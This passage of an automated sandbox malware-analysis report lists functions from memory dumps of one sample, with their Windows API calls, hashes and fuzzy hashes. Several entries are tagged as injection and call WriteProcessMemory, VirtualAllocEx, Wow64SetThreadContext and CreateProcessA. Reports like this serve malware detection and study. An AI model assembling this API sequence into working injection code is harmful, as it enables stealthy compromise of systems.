                                                                          • Instruction ID: 5c62884821c290e65e846bb0e2799d10f215599d77ccfd5e2deca314810cd0b1
                                                                          • Opcode Fuzzy Hash: 99e397d536855549eb6c25e3fb35f2c0051e5250a4a8c7707412ebd393781d2a
                                                                          • Instruction Fuzzy Hash: 023145713082415FC702DF7999A04AEBFA6EFC621071484ABD805CF3A6DE35DD06C3A2
                                                                          Function 07758C80 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,aq
                                                                          • API String ID: 0-3092978723
                                                                          • Opcode ID: 1474ac97ec55b99127b1895d878d6d1e684f87aa22477f243f1a22f097141fec
                                                                          • Instruction ID: 4cfe37082f7ad4d15401476026adc45cc56dc77a63ea1cd119dd016489790a35
                                                                          • Opcode Fuzzy Hash: 1474ac97ec55b99127b1895d878d6d1e684f87aa22477f243f1a22f097141fec
                                                                          • Instruction Fuzzy Hash: F6521AB5A002298FCB64CF69C985BDDBBF6BF88300F1585D9D909A7361DA709D80CF61
                                                                          Function 077531E0 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (_]q
                                                                          • API String ID: 0-188044275
                                                                          • Opcode ID: 878fdcf86f64bb40957be3272821c26a9afbfcc8f55841d77e1a0a3532c8b681
                                                                          • Instruction ID: 0dfc8b42edeb1da9ebc65457fca842a02ab1119bc0ba4de7d52306c02b649ac3
                                                                          • Opcode Fuzzy Hash: 878fdcf86f64bb40957be3272821c26a9afbfcc8f55841d77e1a0a3532c8b681
                                                                          • Instruction Fuzzy Hash: C9227EB5A002059FDB04CFA9D494A6DB7F2FF88384F14856AE9069B3A5CB75EC41CB90
                                                                          Function 077FF724 Relevance: 1.7, APIs: 1, Instructions: 206processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077FF90A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: ce7e6eafa7ce509ce6a917329262c081590a2491dfd7cb69cd5b268ef231cb3e
                                                                          • Instruction ID: 85aad4a338ad5929108d25bf5ab777aef93a6425f44081e0674617a448075f63
                                                                          • Opcode Fuzzy Hash: ce7e6eafa7ce509ce6a917329262c081590a2491dfd7cb69cd5b268ef231cb3e
                                                                          • Instruction Fuzzy Hash: D58146B1D0024A9FDB10CFA9C9857EEBBF1BF48354F148529E859E7344DB749881CB91
                                                                          Function 077FF730 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077FF90A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 3c274d6e7f01f8e60da3fce03f23c8c554fe003016195c300d26e5b2856412b6
                                                                          • Instruction ID: 9740cf2153e1ae678c52e3f55c66f91ac23785e991ea9d057c13476f54a67eef
                                                                          • Opcode Fuzzy Hash: 3c274d6e7f01f8e60da3fce03f23c8c554fe003016195c300d26e5b2856412b6
                                                                          • Instruction Fuzzy Hash: 148134B1D0024A9FDB10CFA9CA857AEBBF2BF48354F148529E859E7344DB749881CB81
                                                                          Function 017EA328 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 017EA57E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 7baeb9013eabee8b2ab374b1df39c6806a3dd0e235d174c8004f806fcbfaf76d
                                                                          • Instruction ID: fa356a5a1996675f1f249b88fd8d300051f1c07759f74fa31b95cce7989e143c
                                                                          • Opcode Fuzzy Hash: 7baeb9013eabee8b2ab374b1df39c6806a3dd0e235d174c8004f806fcbfaf76d
                                                                          • Instruction Fuzzy Hash: 628113B0A00B058FDB24DF2AD14875AFBF1BF88204F10892ED58ADBA50DB75E945CB90
                                                                          Function 07759B0B Relevance: 1.7, Strings: 1, Instructions: 409COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $]q
                                                                          • API String ID: 0-1007455737
                                                                          • Opcode ID: bf473d02014815ac98aa9fa01d18e6ec016199ec536d9fccc153a79d3cdfd7b4
                                                                          • Instruction ID: 6d16a88b79f74ea204d95bb1025967a3daf7fe857dd3bc75e204a8238552e3fc
                                                                          • Opcode Fuzzy Hash: bf473d02014815ac98aa9fa01d18e6ec016199ec536d9fccc153a79d3cdfd7b4
                                                                          • Instruction Fuzzy Hash: 4AE1BFF0704202DFD7149F29D458A6EBAA2EF99340F18446EEA86CB7E5DA74EC41CB11
                                                                          Function 077F454D Relevance: 1.7, APIs: 1, Instructions: 153fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CopyFileA.KERNEL32(?,?,?), ref: 077F469D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFile
                                                                          • String ID:
                                                                          • API String ID: 1304948518-0
                                                                          • Opcode ID: a0af3d8292c3e741d71166cc92a004f7d13a2809722798042cc0074d5783db56
                                                                          • Instruction ID: 3c08db6a79a451173e904bdb0f842055544f3916e92d6d5106e3662e2402ca2e
                                                                          • Opcode Fuzzy Hash: a0af3d8292c3e741d71166cc92a004f7d13a2809722798042cc0074d5783db56
                                                                          • Instruction Fuzzy Hash: 8C51BCF0D002999FDB10CFA9C9457AEBBF2BF48354F148529E855E7380DB7898418B91
                                                                          Function 077F4558 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CopyFileA.KERNEL32(?,?,?), ref: 077F469D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFile
                                                                          • String ID:
                                                                          • API String ID: 1304948518-0
                                                                          • Opcode ID: 1cd9ed94903753d86cef1967a8f54586fc0d6ab9a644979413adb73120f8852e
                                                                          • Instruction ID: aff4bd0d50db5c63fb31a8419a4f8c8d46f1b8470fbd6376b5aca1de3931c19d
                                                                          • Opcode Fuzzy Hash: 1cd9ed94903753d86cef1967a8f54586fc0d6ab9a644979413adb73120f8852e
                                                                          • Instruction Fuzzy Hash: BF519BB0D002998FDB10DFA9CA457AEBBF2FF48354F148529E955E7380DB789841CB91
                                                                          Function 077F531C Relevance: 1.6, APIs: 1, Instructions: 109fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 077F5411
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: ea70f056780fd8c34b792465ed55daec416b6cd9bf4e3563a660099a1c0d883a
                                                                          • Instruction ID: 00705d19ef907ea2c180190758830040fb6809b2192dd6aaea8356fbff45af03
                                                                          • Opcode Fuzzy Hash: ea70f056780fd8c34b792465ed55daec416b6cd9bf4e3563a660099a1c0d883a
                                                                          • Instruction Fuzzy Hash: 3E4175B1C00209AFDB10DFA9C940BAEBFB2FF48714F248429E815A7344DBB498918B91
                                                                          Function 077F5328 Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 077F5411
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 782842c5405feb4a27e85d07b6a2594341c0ee7d2ce12084ab7f5da111eac148
                                                                          • Instruction ID: 94fc889bd3addb36d437942c883d4a68236a70d03f6db6077e60c0b02062b26d
                                                                          • Opcode Fuzzy Hash: 782842c5405feb4a27e85d07b6a2594341c0ee7d2ce12084ab7f5da111eac148
                                                                          • Instruction Fuzzy Hash: B54165B1C10259EFDB10DFA9C941BAEBBB2FF48710F248529E819A7344DBB49491CF91
                                                                          Function 017E8E29 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 017E8E9D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 13302d3b489a225da3c8f3eed9d42462daec0a127ecb6dfaad0e9e8cee45ca2b
                                                                          • Instruction ID: a55f6b89a5beda78e7580246141973052fde032d06a7f75d44a3dae440899e04
                                                                          • Opcode Fuzzy Hash: 13302d3b489a225da3c8f3eed9d42462daec0a127ecb6dfaad0e9e8cee45ca2b
                                                                          • Instruction Fuzzy Hash: 4F31D374804388CFD711EF69D6083A9BFF5AB0E204F58809AD588A7283D7399585CFB2
                                                                          Function 077F5BC0 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 077F5C54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: e0b310bfc55de5f00e1d4a1c393557fbd7fb911b9c8c6f601dd243f1799cf36f
                                                                          • Instruction ID: 0c2204afd9797d3c18f40e16523aabda080408bf1bb50bc23fea4d19a6e890f4
                                                                          • Opcode Fuzzy Hash: e0b310bfc55de5f00e1d4a1c393557fbd7fb911b9c8c6f601dd243f1799cf36f
                                                                          • Instruction Fuzzy Hash: 7B2188B1800249DFDB10CFAAC944BEEBFF5FF48310F14842AE559A7240C7389550DBA4
                                                                          Function 069FE920 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 069FE9B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 129c53b042f75c3acda62faba4549af6c29e7ad8cdcc131bc8801571dfb626a3
                                                                          • Instruction ID: 13fb12624d589a9e4528b28540818b57e6729a7f8b93e0def56fa8154e18a7aa
                                                                          • Opcode Fuzzy Hash: 129c53b042f75c3acda62faba4549af6c29e7ad8cdcc131bc8801571dfb626a3
                                                                          • Instruction Fuzzy Hash: 46213775900309DFCB10DFAAC885BEEBBF5FF48310F508429E959A7250D7789550CBA1
                                                                          Function 069FE928 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 069FE9B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 7a4d0c98b04ce36032930797fbd1f4037b3cc48bae1be538c75b3e0027ebbba4
                                                                          • Instruction ID: 6b1129a60129ca2c5abe1b73ea35d863ce4cb308267448146ecac63f05101668
                                                                          • Opcode Fuzzy Hash: 7a4d0c98b04ce36032930797fbd1f4037b3cc48bae1be538c75b3e0027ebbba4
                                                                          • Instruction Fuzzy Hash: 172157B1900309DFCB10DFAAC880BEEBBF5FF48310F508429E959A7250C7789940CBA0
                                                                          Function 077F5BC8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 077F5C54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: fbc5e71c962e9b7935e7f4cae29c5a8c62c19bf9310543dca67dc6baba12f749
                                                                          • Instruction ID: 3582181b54d9e8e131e3438574cc09795f943a0daa12d0ecaba393782a8f1d8a
                                                                          • Opcode Fuzzy Hash: fbc5e71c962e9b7935e7f4cae29c5a8c62c19bf9310543dca67dc6baba12f749
                                                                          • Instruction Fuzzy Hash: E52175B1800249DFCB10DFAAC940AEEBBF5FF48310F50842AE959A3240C7389950DBA0
                                                                          Function 077FFE38 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077FFEBE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 5ce8353594623a4e51ae54758340ee90d9d18f20532856573a7bb4992b201ec0
                                                                          • Instruction ID: 8b08d5e30c8e45814927c37d9a0901c85be7ec77a703eb0e2168e00f9c241c73
                                                                          • Opcode Fuzzy Hash: 5ce8353594623a4e51ae54758340ee90d9d18f20532856573a7bb4992b201ec0
                                                                          • Instruction Fuzzy Hash: DA2157B59002098FCB10DFAAC5857EEBBF5EF48320F14842AD559A7341CB789945CFA1
                                                                          Function 017EC7D4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,017ECBD6,?,?,?,?,?), ref: 017ECC97
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 13ba80834008417b6f7052e50f94550b69b1b4f5e49e11c1907721b272fadea9
                                                                          • Instruction ID: 8075c2fb4840791ad1662d0ab4931731bcbe69143b173d787399bf5e1257228d
                                                                          • Opcode Fuzzy Hash: 13ba80834008417b6f7052e50f94550b69b1b4f5e49e11c1907721b272fadea9
                                                                          • Instruction Fuzzy Hash: FA21E5B5900248DFDB10CF9AD584ADEFBF5EB48310F14845AE918A7310D379A950CFA5
                                                                          Function 069F94A1 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069F951C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 9723ddb151dfa10c799e8cab565ce54daf6f6dbf8ad2b9448c04b274397c5add
                                                                          • Instruction ID: b71bd1cc62b42bf7e410dddf5dff710b57d7245279717fb7b37c077aec1933e2
                                                                          • Opcode Fuzzy Hash: 9723ddb151dfa10c799e8cab565ce54daf6f6dbf8ad2b9448c04b274397c5add
                                                                          • Instruction Fuzzy Hash: 5B2104B18002499FDB10DFAAC445BEEFBF5EF48320F64842AD559A7240CB789945CFA1
                                                                          Function 077FFE40 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077FFEBE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: cd3f8695b1d510512e0810f0167a0aabcc6f981b9f1509504ee8de45c3f3313c
                                                                          • Instruction ID: c689cdfec28a7964672bec2d8d4c43d15351f71e7ca19f341f0b7d2a882546bd
                                                                          • Opcode Fuzzy Hash: cd3f8695b1d510512e0810f0167a0aabcc6f981b9f1509504ee8de45c3f3313c
                                                                          • Instruction Fuzzy Hash: 6A2135B19002098FDB10DFAAC5857EEBBF5EF48314F54882AD559A7341CB78A945CFA0
                                                                          Function 017ECC08 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,017ECBD6,?,?,?,?,?), ref: 017ECC97
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 69dbaf4581b3f4791a95b0507abffc3390472a97f2ff0727979d6ecd16c98225
                                                                          • Instruction ID: 49077ed9468c681d22646c895157500fa5641759956fa992e6a6c7fd2abe4a39
                                                                          • Opcode Fuzzy Hash: 69dbaf4581b3f4791a95b0507abffc3390472a97f2ff0727979d6ecd16c98225
                                                                          • Instruction Fuzzy Hash: 6D21D2B59002089FDB10CFAAD584AEEFBF5FB48310F14841AE918A7350D378A950CF64
                                                                          Function 069F841B Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 565768e94315542adb395611728a268d898f07b286a552cc5b1b9dbe6b94061a
                                                                          • Instruction ID: 6dc1d5e3f026d9189dfcc172c57c92c89569ea41740f987445e51163473e0915
                                                                          • Opcode Fuzzy Hash: 565768e94315542adb395611728a268d898f07b286a552cc5b1b9dbe6b94061a
                                                                          • Instruction Fuzzy Hash: EF114AB19002498EDB20DFAAC9447EEFFF8AF49224F24841AD559A7640DA389944CFA5
                                                                          Function 069F94A8 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069F951C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c5db2be8ad80e08d01d0afdac7ad1e69b7c09dc3e4ff3732800ce25842ff538a
                                                                          • Instruction ID: 77e5740fe49ef74bb7aca80d322e8c8e6e747663e1f7972c497e6cc16189fcac
                                                                          • Opcode Fuzzy Hash: c5db2be8ad80e08d01d0afdac7ad1e69b7c09dc3e4ff3732800ce25842ff538a
                                                                          • Instruction Fuzzy Hash: 8621E5B1C002499FDB10DFAAC445BEEFBF5EF48320F548429D559A7240CB789945CFA1
                                                                          Function 0759FC28 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0759FC9C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244369902.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7590000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 5e36aaeb4f484735a8fbf59ffd94b95c735a0dc2073758cb7eb19fd4ebfc988e
                                                                          • Instruction ID: 5aa3ead9d375505c49acb5d0319b0b1a667bc9aa7363619ea853a9dd84e07f25
                                                                          • Opcode Fuzzy Hash: 5e36aaeb4f484735a8fbf59ffd94b95c735a0dc2073758cb7eb19fd4ebfc988e
                                                                          • Instruction Fuzzy Hash: F11117B1D002499FCB10DFAAC444AEEFBF5FF48310F50882AD419A7250CB79A944CFA1
                                                                          Function 069FE681 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069FE6F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: f72353f8c6d3da3d8fc2c3dc62bf873ed3ca18bf185cc9f4d1b9f58312fcc5bc
                                                                          • Instruction ID: 10ba8e4b5b77109e6e365214efc56eccb23715f7851cc5ef608b3be29b23e9b0
                                                                          • Opcode Fuzzy Hash: f72353f8c6d3da3d8fc2c3dc62bf873ed3ca18bf185cc9f4d1b9f58312fcc5bc
                                                                          • Instruction Fuzzy Hash: 15115975800249DFCB10DFAAC844BEEBFF5FF48310F208419E559A7250C7359540CBA1
                                                                          Function 069F8420 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 8015cfc1a73163cfbaf729210ec8078e80339cdce1ab114da3257b5d14bc74d9
                                                                          • Instruction ID: d5c265cec2510b3e120b1ac20857b99d12d06056afc47b19b99fe4b37014796d
                                                                          • Opcode Fuzzy Hash: 8015cfc1a73163cfbaf729210ec8078e80339cdce1ab114da3257b5d14bc74d9
                                                                          • Instruction Fuzzy Hash: 961137B19002598EDB10DFAAC9447EEFBF9AF49320F64841AD559A7240CB38A944CBA4
                                                                          Function 069FE688 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069FE6F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 81f1e366e9f8a7cec9ebb91d5b02605450cb116125be9a9c8a9dc8f11694f058
                                                                          • Instruction ID: 6b830fb01efcfa622181db10b2f5eac2a8f72e9305a7a1e933c29e8a32258c63
                                                                          • Opcode Fuzzy Hash: 81f1e366e9f8a7cec9ebb91d5b02605450cb116125be9a9c8a9dc8f11694f058
                                                                          • Instruction Fuzzy Hash: 0C1137718002499FCB10DFAAC844AEEBFF5FF48310F208419E519A7250C779A940CFA1
                                                                          Function 017E8E38 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 017E8E9D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
